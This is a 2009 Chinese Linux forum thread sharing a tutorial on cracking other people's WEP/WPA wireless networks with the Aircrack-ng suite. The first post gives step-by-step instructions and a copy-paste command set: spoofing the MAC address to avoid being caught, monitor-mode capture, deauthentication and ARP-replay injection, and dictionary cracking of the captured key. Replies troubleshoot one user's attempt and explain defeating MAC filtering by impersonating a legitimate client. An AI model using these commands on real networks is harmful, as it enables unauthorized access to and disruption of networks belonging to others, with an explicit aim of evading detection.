破解WLAN无线网络资料[5月7日更新]

包含网卡/无线网的网络问题和ADSL/校园网/宽带拨号支持及代理/共享等网络使用问题
回复
头像
friend.ethan
帖子: 687
注册时间: 2008-05-13 20:40
来自: 江南西道

破解WLAN无线网络资料[5月7日更新]

#1

帖子 friend.ethan » 2009-03-15 20:18

觉得好的话麻烦回下贴
重要申明:破解仅限于研究学习交流,请勿用于非法目的!所有浏览本帖的朋友依据本帖做出的行为请遵守当地的法律,并且所有责任自己承担!如果继续浏览视为同意自己承担责任,本人概不负责!
wiki
更多的资料(英文)
http://www.aircrack-ng.org/doku.php?id=Main

再转一篇实战的



网上闲逛,google到这篇文章,看看挺不错,适合初哥。作者功底不错,版权意识也很强,嘻嘻,
无线破解攻击工具使用详解
作者:MHY_MHY 最初发表在 http://blog.csdn.net/mhy_mhy ,最后修改17:00 2008/11/6。

本文主要是针对无线网络的密码破解,使用平台 linux 2.26.21.5 ,实现环境 BACKTRACK 3 FINAL(USB),无线破解工具 Aircrack-ng ,官方网站http://www.aircrack-ng .org ,Aircrack-ng系列工具也有windows 平台版本,但是本人的小黑的始终不能在win下抓包,所以只能 弃 win 从 lin 了,另外 win 下扫描到的 AP 也比 lin 下少了很多。其实 WIN 并不完整的支持 TCP/IP 协议族,有些协议 win 直接丢弃不用。网络本来从一开始就是 unix 的天下,win 只是在后来加入了网络的功能。

Aircrack-ng工具包有很多工具,我用到的工具主要有以下几个:
airmon-ng 处理网卡工作模式
airodump-ng 抓包
aircrack-ng 破解
aireplay-ng 发包,干扰
另外还要用到以下 linux 命令:
ifconfig 查看修改网卡状态和参数
macchanger 伪造 MAC
iwconfig 主要针对无线网卡的工具 (同 ifconfig)
iwlist 获取无线网络的更详细信息
另外还有其他的 linux 基本命令,我就不提示了。


具体破解步骤:
1. 修改无线网卡状态:先 dow
2. 伪造无线网卡的 MAC 地址:安全起见,减少被抓到的可能
3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡
4. 修改无线网卡状态: up
5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标
6. 监听抓包:生成 .cap 或 .ivs
7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包
8. 破解 .cap 或 .ivs ,获得 WEP 密码,完成破解



下面详细介绍一下各个命令的基本用法(参照命令的英文说明)

1. ifconfig
用来配置网卡,我们这里主要用来 禁用和启用 网卡:
ifconfig ath0 down
ifconfig ath0 up
禁用一下网卡的目的是为了下一步修改 MAC 。

2.macchanger
用来改变网卡的 MAC 地址,具体用法如下:
usage: macchanger [options] device
-h 显示帮助
-V 显示版本
-s 显示当前MAC
-e 不改变mac,使用硬件厂商写入的MAC
-a 自动生成一个同类型的MAC,同厂商的
-A 自动生成一个不同类型的MAC,不同厂商的
-r 生成任意MAC
-l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品
-m 设置一个自定义的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。

3.airmon-ng
启动无线网卡进入 Monitor 模式,
useage: airmon-ng <start|stop|check> <interface> [channel]
<start|stop|check> 启动,停止,检测
<interface> 指定无线网卡
[channel] 监听频道,现代大多数无线路由默认是 6,随便扫描一下都是这个频道,网管们应该换换了

4.iwconfig
专用的无线网卡配置工具,用来配置特殊的网络信息,不带参数时显示可用网络。
useage:iwconfig interface [options]
[essid{NN|ON|OFF}] 指定essid号 开启关闭
[nwid{NN|on|off}] 指定网络id号 开启关闭
[mode {managed|ad-hoc|....}] 指定无线网络工作模式/类型
[freq N.NNNN[K|M|G]] 指定工作频率
[channel N] 指定频道
[ap {N|off|auto}] 指定AP号 关闭/自动
[sens N] sens 号
[nick N] nick 号
[rate {N|auto|fixed}] 速率控制
[rts {N|auto|fixed|off}] rts控制,如果不知道什么是RTS,那就回去好好去学网络,不用往下看了
[frag {N|auto|fixed|off}] 碎片控制
[enc {NNNN-NNNN|off}] 范围
[power {period N|timeout N}] 电源 频率/超时
[retry {limit N|lifetime N}] 重试 限次/超时
[txpower N{mw|dBm}] 功率 毫瓦/分贝
[commit] 处理

5.iwlist
主要用来显示无线网卡的一些附加信息,同上
useage: iwlist [interface] options
scanning 扫描
frequency 频率
channel 频道
bitrate 速率
rate 速率
encryption 加密
key 密钥
power 电源
txpower 功率
ap ap
accespoints ap
peers 直连
event 事件


6.airodump-ng
抓包工具,我最喜欢用的,详细用法如下:
usage: airodump-ng <options> <interface>[,<interface>,...]

Options:
--ivs :仅将抓取信息保存为 .ivs
--gpsd :使用 GPSd
--write <prefix> :保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分
-w :同 --write
--beacons :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的
--update <secs> :显示更新延迟,没有用过
--showack :显示ack/cts/rts状态,还是那句,不知道rts就不用看了
-h :隐藏已知的,配合上面的选项使用
-f <msecs> :跳频时间
--berlin <secs> :无数据包接收时延迟显示的时间,这句不太好翻译,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.建议学好英文去读原文,翻 译的都会有出入,这是我的理解.(mhy_mhy注)
-r <file> :从指定的文件读取数据包.我也想有人给我抓好包放哪里,呵呵

Filter options:
--encrypt <suite> : 使用密码序列过滤 AP
--netmask <netmask> : 使用掩码过滤 AP
--bssid <bssid> : 使用 bssid 过滤 AP
-a : 过滤无关的客户端

默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令操作:

--channel <channels>:指定频道
--band <abg> :制定带宽
-C <frequencies> :指定频率MHz
--cswitch <method> : 设置频道交换方式
0 : FIFO (default) 先进先出(默认)
1 : Round Robin 循环
2 : Hop on last 最后一跳
-s : 同上
--help : 显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文


7.aireplay-ng

搞破坏的工具,注意杀伤力很大,甚至可以损坏劣质的 AP 设备(小内存的路由器可能会重启,或者彻底被破坏掉),我很喜欢这个东西,相信你也会喜欢的,使用时注意分寸.

usage: aireplay-ng <options> <replay interface>

Filter options:

-b bssid : AP的 MAC
-d dmac : 目标的 MAC
-s smac : 来源的 MAC
-m len : 最小包长度
-n len : 最大包长度
-u type : 帧控制, type field
-v subt : 帧控制, subtype field
-t tods : 帧控制, To DS bit
-f fromds : 帧控制, From DS bit
-w iswep : 帧控制, WEP bit
-D : 禁用 AP 发现功能

Replay options:

-x nbpps : 每秒包数量
-p fctrl : 框架设定 (hex)
-a bssid : 设置AP的 mac
-c dmac : 设置目标的 MAC
-h smac : 设置来源的 mac
-g value : 改变环缓存大小 (默认8)
-F : 选择第一个匹配的包

Fakeauth attack options:

-e essid : 设置目标 AP 的 SSID
-o npckts : 每秒爆破的包数量 (0 自动, 默认 1)
-q sec : 存活时间 秒
-y prga : 共享可信的 key流

ARP欺骗原理 Replay attack options:

-j : 注入 fromDS 数据包,还没有用过这个选项

Fragmentation attack options:

-k IP : 设置目的IP 碎片
-l IP : 设置源IP碎片

Test attack options:

-B : 激活 bitrate 测试

source options:

-i iface : 设置抓包的接口设备
-r file : 从pcap文件析取数据包

attack modes (Numbers can still be used): 攻击模式,最具杀伤力的地方

--deauth count : 不信任一切 (-0)
--fakeauth delay : 欺骗AP的信任 (-1)
--interactive : 交互的选择 (-2)
--arpreplay : 标准的 ARP欺骗原理-request replay (-3)
--chopchop : 解密 WEP 包 (-4)
--fragment : 生成有效的 key流 (-5)
--caffe-latte : 从客户端获取新的 IVs (-6)
--cfrag : 对客户端进行碎片攻击 (-7)
--test : 测试注射及效果 (-9)

--help : 显示这个帮助,这部分是全部依照我的使用来翻译,没有完全准确的翻译,主要对付 那些不给出作者就引用的人,鄙视抄袭.

8.aircrack-ng
破解KEY,漫长的过程.漫不漫长取决于两个方面: 一是网管的聪明程度(能否设置出复杂的密码),二是电脑的速度.

usage: aircrack-ng [options] <.cap / .ivs file(s)>

Common options:

-a <amode> : 暴破 (1/WEP, 2/WPA-PSK)
-e <essid> : 选择 essid 为目标
-b <bssid> : 选择 ap的 mac 为目标,就是破解识别的关键字
-q : 使用安静模式,无数出模式
-C <macs> : 将所有的 AP 合并为一个虚拟的

Static WEP cracking options:

-c : 仅搜索字母数字
-t : 仅搜索二进制
-h : 搜索数字关键字 (用于坏掉的部分),翻译不出来了
-d <mask> : 指定掩码(A1:XX:CF:YY)
-m <maddr> : 用 MAC 匹配可用的数据包
-n <nbits> : WEP 长度 64/128/152/256/512
-i <index> : WEP 索引(1 to 4), default: any
-f <fudge> : 暴破强度 默认2,原文字面意思是"禽兽强迫 捏造 事实",呵呵
-k <korek> : 禁用一种破解方式 (1 to 17)
-x or -x0 : 禁用最新关键字暴破
-x1 : 使用最新关键字暴破 默认
-x2 : 用最新两个字节暴破
-y : 实验单线程模式
-K : KoreK 攻击 (pre-PTW)
-s : 显示为 ASCII
-M <num> : 最大数量 ivs 使用
-D : WEP 非隐蔽模式
-P <num> : PTW debug: 1 disable Klein, 2 PTW
-1 : 尝试一次 PTW

WEP and WPA-PSK cracking options:

-w <words> : 指定目录文件,可以多个
-r <DB> : 制定 airolib-ng 数据库,不能和 -w 一起使用

--help : 显示这个帮助

说明: 作者: papagogo 时间: 2008-11-21 11:31

【接一楼】

说明:


好了,用法都解释完了,主要是后面这三个命令,这是我从英文译过来的,结合我的使用情况,以及我的理解.参数全,没有漏掉任何一项,可能我是第一个把这个完整翻译过来的,之前我没有找到有翻译好的,有些地方并不是准确的遵循原文,希望感兴趣的朋友在转载的时候注上我:mhy_mhy.

-------------------------------------------------------------------------------------------------------------------------
下面的命令集是在你熟悉破解以后用的步骤和上面文章是一样的,只是比较精简!

下面以我的硬件实例来操作一下:
我的硬件是 atheros 的 a/b/g 无线网卡,在 linux 中显示为 ath0 ,我只列出我常用的命令步骤,不再做任何解释:

ifconfig ath0 down
macchanger -r ath0
macchanger -r wifi0
ifconfig ath1 up
airmon-ng start ath1 6
iwconfig ath1
iwlist ath1 scanning
airodump-ng -w *.cap -c 6 ath1

aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1
aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 ath1
aireplay-ng -0 1 -a 00:00:00:00:00:00 -c BB:BB:BB:BB:BB:BB ath1
aireplay-ng -3 -b <AP MAC> -h <my MAC> -i ath1

aircrack-ng -x -f 2 *.cap
aircrack-ng -w passdict.txt *.cap
aircrack-ng -n 64 -b apmac *.ivs
aircrack-ng -w passdict.txt -b 00:00:00:00:00:00 *.cap
注:1 Aircrack-ng在新德里软件里可以找到
2macchanger 在新德里软件管理也有


支持的网卡列表(查看自己的网卡是否被aircrack-ng所支持)
http://www.aircrack-ng.org/doku.php?id= ... ard_to_buy


BackTrack CD 下载地址
http://remote-exploit.org/backtrack_download.html

有几个PDF,有兴趣的都看看~
BT3破解无线WEP和WPA增加版教程.pdf.tar.bz2
BT是一个LIVE LINUX的光盘,功能很强大。UBUNTU安装好了软件和BT下是一样的。
(1.76 MiB) 已下载 3423 次
aircrack-ng_1.0~rc3-1_i386.deb
aircrack-ng的9.04deb包。其他版本请到新德里里搜索添加。
(1.36 MiB) 已下载 1786 次
5楼还有几个附件,1楼传不了了。
上次由 friend.ethan 在 2011-01-07 10:38,总共编辑 16 次。
头像
momova
帖子: 3381
注册时间: 2007-07-11 21:43
系统: archlinux
来自: 东江边

Re: 破解WLAN无线网络资料

#2

帖子 momova » 2009-03-15 21:18

zhe ji tian yi zhi zai wan zhi ge ,xia zai le yi xie dong xi ,hai mei zheng li wan,mei shi zhan .xie xie lou zhu fen xiang.
xin xi tong,mei shu ru fa.
我来了,我看见了,我征服了!
求勾搭,不管饭。
liubii
帖子: 36
注册时间: 2009-04-28 10:50

Re: 破解WLAN无线网络资料

#3

帖子 liubii » 2009-05-05 15:25

aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1
aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 ath1
aireplay-ng -0 1 -a 00:00:00:00:00:00 -c BB:BB:BB:BB:BB:BB ath1
aireplay-ng -3 -b <AP MAC> -h <my MAC> -i ath1

aircrack-ng -x -f 2 *.cap
aircrack-ng -w passdict.txt *.cap
aircrack-ng -n 64 -b apmac *.ivs
aircrack-ng -w passdict.txt -b 00:00:00:00:00:00 *.cap


這部分好暈
型号: thinkpad X201i
cpu: i5
内存: 4G
硬盘: 320G 7200转
操作系统:ub桌面64位
版本: 10.10
头像
jioyo源
帖子: 3476
注册时间: 2008-10-08 13:48

Re: 破解WLAN无线网络资料

#4

帖子 jioyo源 » 2009-05-05 17:10

:em11 有机会试试……
--------------------------------------
论坛精华贴全集:http://forum.ubuntu.org.cn/viewtopic.php?f=48&t=199845
book:http://forum.ubuntu.org.cn/viewtopic.php?f=21&t=198286
头像
friend.ethan
帖子: 687
注册时间: 2008-05-13 20:40
来自: 江南西道

Re: 破解WLAN无线网络资料

#5

帖子 friend.ethan » 2009-05-05 19:20

liubii 写了: 這部分好暈
这个是一个命令的集合,等你看了教程就明白了,挺简单的东西。 :em11
-------------------------------------------------------------------------------------
一楼附件传不了了,放在这里吧。
Kismet基本使用.doc
(212 KiB) 已下载 1528 次
Linux下无线网卡安装通用方法.pdf
(44.67 KiB) 已下载 1117 次
上次由 friend.ethan 在 2009-05-07 9:01,总共编辑 1 次。
头像
friend.ethan
帖子: 687
注册时间: 2008-05-13 20:40
来自: 江南西道

Re: 破解WLAN无线网络资料

#6

帖子 friend.ethan » 2009-05-05 19:21

jioyo源 写了::em11 有机会试试……
是啊 挺好玩的 :em04
liubii
帖子: 36
注册时间: 2009-04-28 10:50

Re: 破解WLAN无线网络资料

#7

帖子 liubii » 2009-05-06 9:26

macchanger -r wifi0
wifi0 是哪个接口? 为什么要伪造两次MAC地址
型号: thinkpad X201i
cpu: i5
内存: 4G
硬盘: 320G 7200转
操作系统:ub桌面64位
版本: 10.10
hock
帖子: 7
注册时间: 2006-11-09 19:13

Re: 破解WLAN无线网络资料

#8

帖子 hock » 2009-05-06 9:45

做个记号,回来再看
头像
friend.ethan
帖子: 687
注册时间: 2008-05-13 20:40
来自: 江南西道

Re: 破解WLAN无线网络资料

#9

帖子 friend.ethan » 2009-05-06 10:16

liubii 写了:macchanger -r wifi0
wifi0 是哪个接口? 为什么要伪造两次MAC地址
wifi0是你的无线网卡,也有可能是wlan0或者其他什么的。可以通过

代码: 全选

iwconfig
来查看
上面有伪造两次MAC么?最后的命令集是用来熟悉以后粘帖复制用的,那样比较方便!
liubii
帖子: 36
注册时间: 2009-04-28 10:50

Re: 破解WLAN无线网络资料

#10

帖子 liubii » 2009-05-06 10:28

liubii@liubii-laptop:~$ sudo airodump-ng -w 123.cap -c 6 eth1
ioctl(SIOCSIWMODE) failed: Invalid argument

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run 'airmon-ng start eth1 <#>'
Sysfs injection support was not found either.
到这就进行不下去了 一直搞不明白
型号: thinkpad X201i
cpu: i5
内存: 4G
硬盘: 320G 7200转
操作系统:ub桌面64位
版本: 10.10
头像
friend.ethan
帖子: 687
注册时间: 2008-05-13 20:40
来自: 江南西道

Re: 破解WLAN无线网络资料

#11

帖子 friend.ethan » 2009-05-06 10:41

liubii 写了:liubii@liubii-laptop:~$ sudo airodump-ng -w 123.cap -c 6 eth1
ioctl(SIOCSIWMODE) failed: Invalid argument

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run 'airmon-ng start eth1 <#>'
Sysfs injection support was not found either.
到这就进行不下去了 一直搞不明白
你的网卡支持监控么?这个要查一查才知道噢~ :em06

把你的ifconfig贴出来看看阿,你要使用监控模式的那块网卡才可以!
你确定是eth1么?那不是有线网络的阿!要用无线网络的监控网卡,必须先虚拟一个出来。
头像
smallapple
论坛版主
帖子: 7868
注册时间: 2009-03-28 15:12

Re: 破解WLAN无线网络资料

#13

帖子 smallapple » 2009-05-06 10:54

过滤mac的有能破解的吗?
头像
friend.ethan
帖子: 687
注册时间: 2008-05-13 20:40
来自: 江南西道

Re: 破解WLAN无线网络资料

#14

帖子 friend.ethan » 2009-05-06 11:08

smallapple 写了:过滤mac的有能破解的吗?
可以阿,过滤的MAC需要你获得合法用户的MAC然后你伪造自己的MAC为合法用户的不就可以了? :em02

更多具体内容请看附件PDF噢~
头像
smallapple
论坛版主
帖子: 7868
注册时间: 2009-03-28 15:12

Re: 破解WLAN无线网络资料

#15

帖子 smallapple » 2009-05-06 11:26

有空研究下。

先谢了。 :em11 :em11
回复